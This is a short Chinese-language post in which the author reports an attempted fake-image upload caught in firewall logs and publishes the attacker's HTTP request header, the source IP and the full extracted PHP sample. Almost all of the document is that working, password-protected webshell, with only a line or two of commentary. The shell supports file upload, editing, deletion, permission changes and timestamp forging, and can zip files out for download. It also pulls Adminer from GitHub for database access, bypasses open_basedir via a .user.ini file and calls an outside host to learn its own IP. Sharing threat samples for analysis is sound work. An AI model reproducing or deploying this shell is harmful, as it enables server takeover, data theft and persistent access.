今天在清理防火墙日志的时候发现了一个尝试上传假图片来干坏事的孙子,给 PHP 样本发出来一起研究研究,HTTP 包没放完整的,下面跟了一大串 base 64,我给里面的 PHP 提出来单独放下面了。
POST /index/my/do_my_info HTTP/1.1
content-type: application/x-www-form-urlencoded
connection: keep-alive
accept: */*
content-length: 46958
accept-encoding: gzip, deflate
user-agent: python-requests/2.28.1下面是从这孙子传进来的 base64 中提出来的恶意 PHP 程序样本,自行研究,产生的一切后果均与我无关,请自行找这孙子算账,请求来源是 38.47.180.20:[xxxxx](隐私保护,抹除连接服务器时使用的端口)
<?php
error_reporting(0);
define('AUTH', 'BANDEX');
define('SELF', $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
define('HOST', $_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']);
define('WIN', DIRECTORY_SEPARATOR == '\\');
date_default_timezone_set('Asia/Jakarta');
session_cache_limiter('private');
set_time_limit(0);
session_start();
ob_start();
$p0 = $_POST;
unset($_POST);
$act = isset($p0['act']) ? $p0['act'] : '';
for ($p = 1; $p <= 3; $p++) {
${'p' . $p} = isset($p0['p' . $p]) ? $p0['p' . $p] : '';
}
$time = (time() + 86400 * 365);
if (!isset($_COOKIE['IP'])) {
$net = json_decode(curl('https://' . strtolower(AUTH) . '.app'), TRUE);
if (!is_null($net)) {
$ip = $net['ip'];
}
setcookie('IP', isset($ip) ? $ip : gethostbyname(gethostname()), $time);
}
if ($act === 'auth') {
$auth = strtoupper($p0['password']);
if (hex($auth) === hex(AUTH)) {
setcookie(AUTH, hex($auth), $time);
header('Location: ' . SELF);
exit();
}
}
if (!isset($_COOKIE[AUTH])) {
auth();
} else {
if ($_COOKIE[AUTH] !== hex(AUTH)) {
auth();
}
}
$msg = '';
!$act && $act = 'file';
if (isset($p0['cwd']) && $p0['cwd']) {
chdir($p0['cwd']);
} else {
chdir(str_replace('\\', '/', dirname(__FILE__)) . '/');
}
$cwd = getcwd();
$pwd = $_SERVER['DOCUMENT_ROOT'];
foreach (['cwd', 'pwd'] as $a) {
if (WIN) {
$$a = str_replace('\\', '/', $$a);
}
if (substr($$a, -1) != '/') {
$$a = $$a . '/';
}
}
if (!function_exists('scandir')) {
function scandir($a){
$b = [];
while ($c = readdir(opendir($a))) {
$b[] = $c;
}
return $b ? $b : 0;
}
}
if ($act == 'download') {
if (is_file($p1) && is_readable($p1)) {
$a = pathinfo($p1);
if (function_exists('mime_content_type')) {
header('Content-Type: ' . mime_content_type($p1));
} else {
header('Content-type: application/x-' . $a['extension']);
}
header('Content-Disposition: attachment; filename=' . $a['basename']);
header('Content-Length: ' . sprintf("%u", filesize($p1)));
ob_end_clean();
readfile($p1);
exit();
} else {
$msg = 'Can\'t read file';
$act = 'file';
}
}
?>
<html>
<head>
<meta name='robots' content='noindex, nofollow, noarchive;'>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8;'>
<title><?php echo HOST; ?></title>
<style type='text/css'>
body, td {font: 12px Arial, Tahoma; line-height: 16px;}
.input, select {font: 12px Arial, Tahoma; background: #fff; border: 1px solid #666; padding: 2px; height: 22px;}
.area {font: 12px 'Courier New', Monospace; background: #fff; border: 1px solid #666; padding: 2px;}
.red {color: #f00;}
.black {color: #000;}
.green {color: #090;}
.b {font-weight: bold;}
.bt {border-color: #b0b0b0; background: #3d3d3d; color: #fff; font: 12px Arial, Tahoma; height: 22px;}
a {color: #00f; text-decoration: none;}
a:hover {color: #f00; text-decoration: underline;}
.alt1 td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #f1f1f1; padding: 5px 15px 5px 5px;}
.alt2 td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #f9f9f9; padding: 5px 15px 5px 5px;}
.focus td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #ffa; padding: 5px 15px 5px 5px;}
.head td {border-top: 1px solid #fff; border-bottom: 1px solid #ddd; background: #e9e9e9; padding: 5px 15px 5px 5px;}
form {margin: 0; padding: 0;}
h2 {margin: 0; padding: 0; height: 24px; line-height: 24px; font-size: 14px; color: #5B686F;}
u {text-decoration: none; color: #777; float: left; display: block; width: 150px; margin-right: 10px;}
.drives {padding: 5px;}
.drives span {margin: auto 3px;}
</style>
<script type='text/javascript'>
function $(a){
return document.getElementById(a);
}
function cbox(a){
for (var b = 0; b < a.elements.length; b++) {
var c = a.elements[b];
if (c.type == 'checkbox') {
if (c.name != 'chkall')
c.checked = a.chkall.checked;
}
}
}
function cdir(){
var a;
a = prompt('Input the directory name:', '');
if (!a) return;
exe(null, null, 'create', a);
}
function cfil(){
var a;
a = prompt('Input the file name:', '');
if (!a) return;
exe('edit', null, null, a);
}
function form(a, b, c, d, e){
if (a != null) $('opform').act.value = a;
if (b != null) $('opform').cwd.value = b;
if (c != null) $('opform').p1.value = c;
if (d != null) $('opform').p2.value = d;
if (e != null) $('opform').p3.value = e;
}
function perm(a, b){
var c;
c = prompt("Current folder/file: " + a + "\nInput new permissions:", b);
if (!c) return;
exe(null, null, 'chmod', a, c);
}
function edit(a){
var b;
b = prompt("Filename: " + a + "\nInput new filename:", "");
if (!b) return;
exe(null, null, 'rename', b, a);
}
function exe(a, b, c, d, e){
form(a, b, c, d, Array.from(new TextEncoder().encode(e)).map(f => f.toString(16).padStart(2, '0')).join(''));
$('opform').submit();
}
</script>
</head>
<body style='margin: 0; table-layout: fixed; word-break: break-all;'>
<?php
fhead(['name' => 'opform']);
fhide('act', $act);
fhide('cwd', $cwd);
fhide('p1', $p1);
fhide('p2', $p2);
fhide('p3', $p3);
mhtml('</form>');
?>
<table width='100%' border='0' cellpadding='0' cellspacing='0' style='text-align: center;'>
<tr class='head'>
<td><b><?php echo php_uname(); ?></b></td>
</tr>
</table>
<table width='100%' border='0' cellpadding='15' cellspacing='0'><tr><td>
<?php
$msg && message($msg);
if ($act == 'file') {
$dw = is_writable($cwd) ? 'Writable' : 'Non-writable';
if (isset($p1)) {
switch ($p1) {
case 'create':
if ($p2) {
message('Directory created ' . (mkdir($cwd . $p2, 0755) ? 'success' : 'failed'));
}
break;
case 'upload':
message('File upload ' . (move_uploaded_file($_FILES['upload']['tmp_name'], $cwd . '/' . $_FILES['upload']['name']) ? 'success' : 'failed'));
break;
case 'chmod':
if ($p2 && $p3) {
$p3 = base_convert(unhex($p3), 8, 10);
message('Set file permissions ' . (chmod($p2, $p3) ? 'success' : 'failed'));
}
break;
case 'rename':
if ($p2 && $p3) {
$p3 = unhex($p3);
message($p3 . ' renamed ' . $p2 . (rename($p3, $p2) ? ' success' : ' failed'));
}
break;
case 'settime':
if ($p2 && $p3) {
$time = strtotime(unhex($p3));
message('Set file last modified ' . (touch($p2, $time, $time) ? 'success' : 'failed'));
}
break;
case 'delete':
if ($p0['dl']) {
$a = $b = 0;
foreach ($p0['dl'] as $c) {
if (is_dir($cwd . $c)) {
if (remove($cwd . $c)) {
$a++;
} else {
$b++;
}
} else {
if (unlink($cwd . $c)) {
$a++;
} else {
$b++;
}
}
}
message('Deleted folder/file(s) have finished, choose ' . count($p0['dl']) . ', success ' . $a . ', failed ' . $b);
} else {
message('Please select folder/file(s)');
}
break;
case 'paste':
if ($_SESSION['exe'] == 'copy') {
foreach ($_SESSION['list'] as $a) {
duplicate($_SESSION['dir'], $a, $cwd);
}
} elseif ($_SESSION['exe'] == 'move') {
foreach ($_SESSION['list'] as $a) {
rename($_SESSION['dir'] . $a, $cwd . $a);
}
}
unset($_SESSION['exe'], $_SESSION['list'], $_SESSION['dir']);
message('Have been restored from the session');
break;
case 'zip':
if ($p0['dl']) {
$a = sys_get_temp_dir() . '/' . HOST . '_' . date('YmdHis') . '.zip';
$b = new ZipArchive();
if ($b->open($a, ZipArchive::CREATE)) {
foreach ($p0['dl'] as $c) {
if ($c == '.' || $c == '..') continue;
if (is_file($cwd . $c)) {
if (is_readable($cwd . $c)) {
$b->addFile($cwd . $c, $c);
}
} elseif (is_dir($cwd . $c)) {
$d = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($c . '/', FilesystemIterator::SKIP_DOTS));
foreach ($d as $e => $f) {
if (is_readable(realpath($e))) {
$b->addFile(realpath($e), $e);
}
}
}
}
$b->close();
header('Content-Type: application/zip');
header('Content-Disposition: attachment; filename="' . basename($a) . '"');
header('Content-Length: ' . filesize($a));
ob_end_clean();
readfile($a);
unlink($a);
exit();
}
} else {
message('Please select folder/file(s)');
}
break;
case 'unzip':
if ($p0['dl']) {
if (is_writable($cwd)) {
$a = new ZipArchive();
foreach ($p0['dl'] as $b) {
if (is_readable($cwd . $b)) {
$a->open($cwd . $b);
$a->extractTo($cwd);
}
}
$a->close();
} else {
message('Directory is not writable');
gback();
}
} else {
message('Please select file(s) Zip');
}
break;
default:
if ($p1 == 'copy' || $p1 == 'move') {
if (isset($p0['dl']) && count($p0['dl'])) {
$_SESSION['exe'] = $p1;
$_SESSION['list'] = $p0['dl'];
$_SESSION['dir'] = $p0['cwd'];
message('Have been saved to the session');
} else {
message('Please select folder/file(s)');
}
}
break;
}
echo "<script type=\"text/javascript\">$('opform').p1.value='';$('opform').p2.value='';</script>";
}
$cl = '';
$pl = explode('/', $cwd);
for ($a = 0; $a < count($pl) - 1; $a++) {
$cl .= '<a href="javascript:exe(\'file\', \'';
for ($b = 0; $b <= $a; $b++) {
$cl .= $pl[$b] . '/';
}
$cl .= '\');">' . $pl[$a] . '/</a>';
}
?>
<script type='text/javascript'>
document.onclick = shownav;
function shownav(a){
var b = a ? a.target : event.srcElement;
do {
if (b.id == 'jump') {
$('inputnav').style.display = '';
$('pathnav').style.display = 'none';
return;
}
if (b.id == 'inputnav') {
return;
}
b = b.parentNode;
} while (b.parentNode)
$('inputnav').style.display = 'none';
$('pathnav').style.display = '';
}
</script>
<div style='background: #eee; margin-bottom: 10px;'>
<form onsubmit="exe('file', this.cwd.value);return false;" method="post" id="godir" name="godir">
<table id='pathnav' width='100%' border='0' cellpadding='5' cellspacing='0'>
<tr>
<td width='100%'><?php echo $cl . ' - ' . gchmod($cwd) . ' / ' . mcolor($cwd) . guid($cwd); ?> (<?php echo $dw; ?>)</td>
<td nowrap><input class='bt' id='jump' name='jump' value='Jump to' type='button'></td>
</tr>
</table>
<table id='inputnav' width='100%' border='0' cellpadding='5' cellspacing='0' style='display:none;'>
<tr>
<td nowrap>Current Directory (<?php echo $dw; ?>, <?php echo gchmod($cwd); ?>)</td>
<td width='100%'><input class='input' name='cwd' value='<?php echo $cwd; ?>' type='text' style='width: 99%; margin: 0 8px;'></td>
<td nowrap><input class='bt' value='GO' type='submit'></td>
</tr>
</table>
</form>
<?php
if (WIN) {
$a = '';
mhtml('<div class="drives">');
foreach (range('A', 'Z') as $b) {
if (is_dir($b . ':/')) {
mhtml($a . '<a href="javascript:exe(\'file\', \'' . $b . ':/\');">' . strtoupper($b) . ':\</a>');
$a = '<span></span>';
}
}
mhtml('</div>');
}
?>
</div>
<?php
mhtml('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
mhtml('<tr class="alt1"><td colspan="6" style="padding: 5px; line-height: 20px;">');
mhtml('<form action="' . SELF . '" method="post" enctype="multipart/form-data"><div class="bt" style="float: right;"><input type="file" name="upload" onchange="this.form.submit()"/><input type="hidden" name="p1" value="upload"><input name="cwd" value="' . $cwd . '" type="hidden"/></div></form>');
mhtml('<a href="javascript:exe(\'file\', \'' . str_replace('\\', '/', $pwd) . '\');">WebRoot</a> | <a href="javascript:cdir();">CreateDirectory</a> | <a href="javascript:cfil();">CreateFile</a> | <a href="javascript:exe(\'sql\');">MySQL</a> | <a href="javascript:exe(\'bypass\');">OpenBaseDir</a>');
mhtml('</td></tr>');
$sort = ['filename', 1];
if ($p1) {
if (preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) {
$sort = [$match[1], (int)$match[2]];
}
}
fhead(['name' => 'flist']);
fhide('act', 'file');
fhide('p1', '');
fhide('cwd', $cwd);
mhtml('<tr class="head">');
mhtml('<td width="2%" nowrap><input name="chkall" value="on" type="checkbox" onclick="cbox(this.form)"/></td>');
mhtml('<td><a href="javascript:exe(\'file\',null,\'s_filename_' . ($sort[1] ? 0 : 1) . '\');">Filename</a> ' . ($p1 == 's_filename_0' ? '▼' : '') . ($p1 == 's_filename_1' || !$p1 ? '▲' : '') . '</td>');
mhtml('<td width="16%"><a href="javascript:exe(\'file\',null,\'s_mtime_' . ($sort[1] ? 0 : 1) . '\');">Last modified</a> ' . ($p1 == 's_mtime_0' ? '▼' : '') . ($p1 == 's_mtime_1' ? '▲' : '') . '</td>');
mhtml('<td width="10%"><a href="javascript:exe(\'file\',null,\'s_size_' . ($sort[1] ? 0 : 1) . '\');">Size</a> ' . ($p1 == 's_size_0' ? '▼' : '') . ($p1 == 's_size_1' ? '▲' : '') . '</td>');
mhtml('<td width="20%">Permissions</td>');
mhtml('<td width="22%">Action</td>');
mhtml('</tr>');
$dd = $fd = [];
$ds = scandir($cwd);
if ($ds) {
$ds = array_diff($ds, ['.']);
foreach ($ds as $fn) {
$fp = $cwd . $fn;
if (is_dir($fp)) {
$ddb['filename'] = $fn;
$ddb['mtime'] = date('Y-m-d H:i:s', filemtime($fp));
$ddb['chmod'] = gchmod($fp);
$ddb['perm'] = mcolor($fp);
$ddb['owner'] = guid($fp);
$ddb['link'] = $fp;
if ($fn == '..') {
$dd['up'] = 1;
} else {
$dd[] = $ddb;
}
} else {
$fdb['filename'] = $fn;
$fdb['size'] = sprintf("%u", filesize($fp));
$fdb['mtime'] = date('Y-m-d H:i:s', filemtime($fp));
$fdb['chmod'] = gchmod($fp);
$fdb['perm'] = mcolor($fp);
$fdb['owner'] = guid($fp);
$fdb['link'] = $fp;
$fd[] = $fdb;
}
}
unset($ddb);
unset($fdb);
}
$di = '0';
if (isset($dd['up'])) {
mhtml('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';"></tr>');
}
unset($dd['up']);
usort($dd, 'gsort');
usort($fd, 'gsort');
foreach ($dd as $dk => $ddb) {
if ($p1 == 'getsize' && $p2 == $ddb['filename']) {
$att = rsize($p2);
$att = is_numeric($att) ? ssize($att) : 'Unknown';
} else {
$att = '<a href="javascript:exe(\'file\', null, \'getsize\', \'' . $ddb['filename'] . '\');">View</a>';
}
mhtml('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
mhtml('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="' . $ddb['filename'] . '"></td>');
mhtml('<td><a href="javascript:exe(\'file\',\'' . $ddb['link'] . '\')">' . $ddb['filename'] . '</a></td>');
mhtml('<td nowrap><a href="javascript:exe(\'time\',null,\'' . $ddb['filename'] . '\');">' . $ddb['mtime'] . '</a></td>');
mhtml('<td nowrap>' . $att . '</td>');
mhtml('<td nowrap>');
mhtml('<a href="javascript:perm(\'' . $ddb['filename'] . '\', \'' . $ddb['chmod'] . '\');">' . $ddb['chmod'] . '</a> / ');
mhtml('<a href="javascript:perm(\'' . $ddb['filename'] . '\', \'' . $ddb['chmod'] . '\');">' . $ddb['perm'] . '</a>' . $ddb['owner'] . '</td>');
mhtml('<td nowrap><a href="javascript:edit(\'' . $ddb['filename'] . '\');">Rename</a></td>');
mhtml('</tr>');
$di++;
}
$fi = '0';
foreach ($fd as $fk => $fdb) {
$fu = '/' . str_replace($pwd, '', $fdb['link']);
mhtml('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
mhtml('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="' . $fdb['filename'] . '"></td>');
mhtml('<td>' . ((strpos($fdb['link'], $pwd) !== FALSE) ? '<a href="' . $fu . '" target="_blank">' . $fdb['filename'] . '</a>' : $fdb['filename']) . '</td>');
mhtml('<td nowrap><a href="javascript:exe(\'time\',null,\'' . $fdb['filename'] . '\');">' . $fdb['mtime'] . '</a></td>');
mhtml('<td nowrap>' . ssize($fdb['size']) . '</td>');
mhtml('<td nowrap>');
mhtml('<a href="javascript:perm(\'' . $fdb['filename'] . '\', \'' . $fdb['chmod'] . '\');">' . $fdb['chmod'] . '</a> / ');
mhtml('<a href="javascript:perm(\'' . $fdb['filename'] . '\', \'' . $fdb['chmod'] . '\');">' . $fdb['perm'] . '</a>' . $fdb['owner'] . '</td>');
mhtml('<td nowrap>');
mhtml('<a href="javascript:exe(\'download\',null,\'' . $fdb['filename'] . '\');">Download</a> | ');
mhtml('<a href="javascript:exe(\'edit\',null,null,\'' . $fdb['filename'] . '\');">Edit</a> | ');
mhtml('<a href="javascript:edit(\'' . $fdb['filename'] . '\');">Rename</a>');
mhtml('</td></tr>');
$fi++;
}
mhtml('<tr class="alt2 head"><td colspan="5"><a href="#" onclick="$(\'flist\').p1.value=\'zip\';$(\'flist\').submit();">ZipArchive</a> | <a href="#" onclick="$(\'flist\').p1.value=\'unzip\';$(\'flist\').submit();">ZipExtract</a> | <a href="#" onclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();">Delete</a> | <a href="#" onclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();">Copy</a> | <a href="#" onclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();">Move</a>' . (isset($_SESSION['exe']) && count($_SESSION['list']) ? ' | <a href="#" onclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();">Paste</a>' : "") . '</td><td align="right">' . $di . " directories / " . $fi . " files</td></tr>");
mhtml('</form></table>');
} elseif ($act == 'edit') {
if ($p1 == 'edit' && $p2 && $p3) {
$a = fopen($p2, 'w+');
message('Save file ' . (fwrite($a, unhex($p3)) ? 'success' : 'failed'));
fclose($a);
}
$b = '';
if (file_exists($p2)) {
$a = fopen($p2, 'r');
if (filesize($p2) !== 0) {
$b = fread($a, filesize($p2));
}
fclose($a);
$b = htmlspecialchars($b);
}
fhead(['title' => 'Create / Edit File', 'onsubmit' => 'exe(\'edit\',null,\'edit\',this.p2.value,this.p3.value);return false;']);
minput(['title' => 'Name', 'name' => 'p2', 'value' => $p2, 'newline' => 1]);
mtext(['title' => 'Content', 'name' => 'p3', 'value' => $b]);
ffoot();
gback();
} elseif ($act == 'time') {
fhead(['title' => 'Set last modified', 'onsubmit' => 'exe(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;']);
minput(['title' => 'Current folder/file', 'name' => 'p2', 'value' => $p1, 'newline' => 1]);
minput(['title' => 'Modify time', 'name' => 'p3', 'value' => date('Y-m-d H:i:s', filemtime($p1)), 'newline' => 1]);
ffoot();
gback();
} elseif ($act == 'sql') {
$a = $act . '.php';
if (is_writable($p0['cwd'])) {
$b = $p0['cwd'] . $a;
$c = fopen($b, 'w+');
$d = curl('https://api.github.com/repos/adminerevo/adminerevo/releases/latest');
fwrite($c, curl(json_decode($d, TRUE)['assets'][0]['browser_download_url']));
fclose($c);
if (strpos($p0['cwd'], $pwd) === FALSE) {
$c = (chmod($pwd, 0755) ? TRUE : FALSE);
if (is_writable($pwd) && $c === TRUE) {
$b = $pwd . $a;
rename($p0['cwd'] . $a, $b);
}
}
if (file_exists($b) && filesize($b) !== 0) {
echo '<script>window.location.replace(\'/' . str_replace($pwd, '', $b) . '\');</script>';
}
} else {
message('Directory is not writable');
gback();
}
} elseif ($act == 'bypass') {
$a = $pwd . 'public';
if (!is_dir($a)) {
$b = (mkdir($a, 0755) ? TRUE : FALSE);
} else {
$b = (chmod($a, 0755) ? TRUE : FALSE);
}
if (is_writable($a) && $b === TRUE) {
$c = $a . '/.user.ini';
if (!file_exists($c)) {
$d = fopen($c, 'w+');
fwrite($d, 'open_basedir=/');
fclose($d);
}
$e = $a . '/index.php';
if (!file_exists($e)) {
copy($_SERVER['DOCUMENT_ROOT'] . SELF, $e);
}
echo '<script>window.location.replace(\'/public/index.php\');</script>';
} else {
message('Bypass base_dir failed');
gback();
}
} else {
message('Undefined Action');
gback();
}
?>
</td></tr></table>
<div style='padding: 5px; border-bottom: 1px solid #fff; border-top: 1px solid #ddd; background: #eee; text-align: center; font-weight: bold;'>
<tr class='alt1'>
<td>《 <?php echo $_COOKIE['IP']; ?> 》</td>
</tr>
</div>
</body>
</html>
<?php
function auth(){
fhead();
fhide('act', 'auth');
mhtml('<style>input {margin: 0; background-color: inherit; border: 1px solid transparent; text-align: center;}</style><center>');
minput(['name' => 'password', 'type' => 'password', 'size' => '10']);
mhtml('</form></center>');
exit();
}
function curl($a, $b = ''){
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $a);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($c, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
if ($b != '') {
curl_setopt($c, CURLOPT_POSTFIELDS, $b);
curl_setopt($c, CURLOPT_POST, TRUE);
}
curl_setopt($c, CURLOPT_USERAGENT, 'curl/' . curl_version()['version']);
if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
(!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') ||
(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on')) {
$d = 'https';
} else {
$d = 'http';
}
curl_setopt($c, CURLOPT_REFERER, $d . '://' . HOST . SELF);
$e = curl_exec($c);
curl_close($c);
return $e;
}
function duplicate($a, $b, $c){
if (is_dir($a . $b)) {
mkdir($c . $b);
$d = scandir($a . $b);
if ($d) {
$d = array_diff($d, ['..', '.']);
foreach ($d as $e) {
duplicate($a . $b . '/', $e, $c . $b . '/');
}
}
} elseif (is_file($a . $b)) {
copy($a . $b, $c . $b);
}
}
function ffoot($a = ''){
!$a && $a = 'submit';
mhtml('<p><input class="bt" name="' . $a . '" id="' . $a . '" type="submit" value="Submit"></p>');
mhtml('</form>');
}
function fhead($a = []){
!isset($a['method']) && $a['method'] = 'post';
!isset($a['name']) && $a['name'] = 'form1';
$a['onsubmit'] = isset($a['onsubmit']) ? "onsubmit=\"$a[onsubmit]\"" : '';
mhtml("<form name=\"$a[name]\" id=\"$a[name]\" action=\"" . SELF . "\" method=\"$a[method]\" $a[onsubmit]>");
if (isset($a['title'])) {
mhtml('<h2>' . $a['title'] . ' »</h2>');
}
}
function fhide($a, $b = ''){
mhtml("<input id=\"$a\" type=\"hidden\" name=\"$a\" value=\"$b\"/>");
}
function gback(){
mhtml('<form action="' . SELF . '" method="post"><input type="hidden" name="act" value="file"/><input type="hidden" name="cwd" value="' . $GLOBALS['cwd'] . '"/><p><input class="bt" type="submit" value="Go back..."></p></form>');
}
function gchmod($a){
return substr(base_convert(fileperms($a), 10, 8), -4);
}
function gperms($a){
$b = fileperms($a);
if (($b & 0xc000) === 0xc000) {
$c = 's';
} elseif (($b & 0x4000) === 0x4000) {
$c = 'd';
} elseif (($b & 0xa000) === 0xa000) {
$c = 'l';
} elseif (($b & 0x8000) === 0x8000) {
$c = '-';
} elseif (($b & 0x6000) === 0x6000) {
$c = 'b';
} elseif (($b & 0x2000) === 0x2000) {
$c = 'c';
} elseif (($b & 0x1000) === 0x1000) {
$c = 'p';
} else {
$c = '?';
}
$d['read'] = $b & 00400 ? 'r' : '-';
$d['write'] = $b & 00200 ? 'w' : '-';
$d['execute'] = $b & 00100 ? 'x' : '-';
$e['read'] = $b & 00040 ? 'r' : '-';
$e['write'] = $b & 00020 ? 'w' : '-';
$e['execute'] = $b & 00010 ? 'x' : '-';
$f['read'] = $b & 00004 ? 'r' : '-';
$f['write'] = $b & 00002 ? 'w' : '-';
$f['execute'] = $b & 00001 ? 'x' : '-';
if ($b & 0x800) {
$d['execute'] = $d['execute'] == 'x' ? 's' : 'S';
}
if ($b & 0x400) {
$e['execute'] = $e['execute'] == 'x' ? 's' : 'S';
}
if ($b & 0x200) {
$f['execute'] = $f['execute'] == 'x' ? 't' : 'T';
}
return $c . $d['read'] . $d['write'] . $d['execute'] . $e['read'] . $e['write'] . $e['execute'] . $f['read'] . $f['write'] . $f['execute'];
}
function gsort($a, $b){
global $sort;
if (is_numeric($a[$sort[0]])) {
return ($a[$sort[0]] < $b[$sort[0]] ? -1 : 1) * ($sort[1] ? 1 : -1);
} else {
return strcmp($a[$sort[0]], $b[$sort[0]]) * ($sort[1] ? 1 : -1);
}
}
function guid($a){
if (function_exists('posix_getpwuid')) {
$b = posix_getpwuid(fileowner($a));
if ($b && is_array($b)) {
return ' / <a href="javascript:exe(\'file\', \'\');" title="User: ' . $b['name'] . "
Uid: " . $b['uid'] . "
Gid: " . $b['gid'] . "
Dir: " . $b['dir'] . "
Shell: " . $b['shell'] . '">' . $b['name'] . '</a>';
}
}
return '';
}
function hex($a){
$b = '';
for ($c = 0; $c < strlen($a); $c++) {
$b .= substr('0' . dechex(ord($a[$c])), -2);
}
return $b;
}
function mcolor($a){
if (!is_readable($a)) {
return '<span style="color: #f00;">' . gperms($a) . "</span>";
} elseif (!is_writable($a)) {
return '<span style="color: #000;">' . gperms($a) . "</span>";
} else {
return '<span style="color: #090;">' . gperms($a) . "</span>";
}
}
function message($a){
echo '<div style="margin: 0 auto 12px auto; background: #ffffe0; border: 1px solid #e6db55; padding: 10px; font: 14px; text-align: center; font-weight: bold;">' . $a . '</div>';
}
function mhtml($a){
echo $a . "\n";
}
function minput($a = []){
$a['size'] = isset($a['size']) && $a['size'] > 0 ? "size=\"$a[size]\"" : "size=\"65\"";
$a['type'] = isset($a['type']) ? $a['type'] : 'text';
$a['title'] = isset($a['title']) ? $a['title'] . '<br/>' : '';
$a['class'] = isset($a['class']) ? $a['class'] : 'input';
$a['name'] = isset($a['name']) ? $a['name'] : '';
$a['value'] = isset($a['value']) ? $a['value'] : '';
if (isset($a['newline'])) mhtml('<p>');
mhtml("$a[title]<input class=\"$a[class]\" name=\"$a[name]\" id=\"$a[name]\" value=\"$a[value]\" type=\"$a[type]\" $a[size]/>");
if (isset($a['newline'])) mhtml('</p>');
}
function mtext($a = []){
$a['title'] = isset($a['title']) ? $a['title'] . '<br/>' : '';
$a['name'] = isset($a['name']) ? $a['name'] : '';
mhtml("<p>$a[title]<textarea class=\"area\" id=\"$a[name]\" name=\"$a[name]\" cols=\"135\" rows=\"45\">$a[value]</textarea></p>");
}
function remove($a){
$b = scandir($a);
if ($b) {
$b = array_diff($b, ['..', '.']);
foreach ($b as $c) {
if (is_dir($a . '/' . $c)) {
chmod($a . '/' . $c, 0777);
remove($a . '/' . $c);
} else {
chmod($a . '/' . $c, 0777);
unlink($a . '/' . $c);
}
}
chmod($a, 0777);
return rmdir($a) ? 1 : 0;
} else {
return 0;
}
}
function rsize($a){
$b = opendir($a);
$c = 0;
while ($d = readdir($b)) {
if ($d != '.' && $d != '..') {
$e = $a . '/' . $d;
$c += is_dir($e) ? rsize($e) : sprintf("%u", filesize($e));
}
}
closedir($b);
return $c;
}
function ssize($a){
$b = ['Bytes', 'KB', 'MB', 'GB', 'TB', 'PB'];
for ($c = 0; $a >= 1024 && $c < 5; $c++) {
$a /= 1024;
}
return round($a, 2) . ' ' . $b[$c];
}
function unhex($a){
$b = '';
for ($c = 0; $c < strlen($a) - 1; $c += 2) {
$b .= chr(hexdec($a[$c] . $a[$c + 1]));
}
return $b;
}
?>